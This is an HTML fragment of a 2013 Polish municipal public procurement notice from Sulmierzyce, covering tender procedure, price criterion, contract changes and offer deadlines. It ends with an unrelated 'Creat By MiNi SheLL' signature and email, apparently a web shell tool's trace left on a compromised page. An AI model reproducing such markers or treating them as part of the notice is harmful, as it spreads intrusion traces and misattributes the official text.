<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana umowy może nastąpić wyłącznie za zgodą obydwu stron wyrażoną na piśmie pod rygorem nieważności. Dopuszczalne zmiany oraz określenie warunków zmian zawarte zostały w projekcie umowy stanowiącym integralną część  Specyfikacji istotnych warunków zamówienia (Dodatek nr 4 do SIWZ).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sulmierzyce.biuletyn.net<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Sulmierzyce - pok. nr 25, 98-338 Sulmierzyce ul. Urzędowa 1..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.02.2013 godzina 09:00, miejsce: Urząd Gminy Sulmierzyce - Sekretariat, 98-338 Sulmierzyce ul. Urzędowa 1..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 29 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com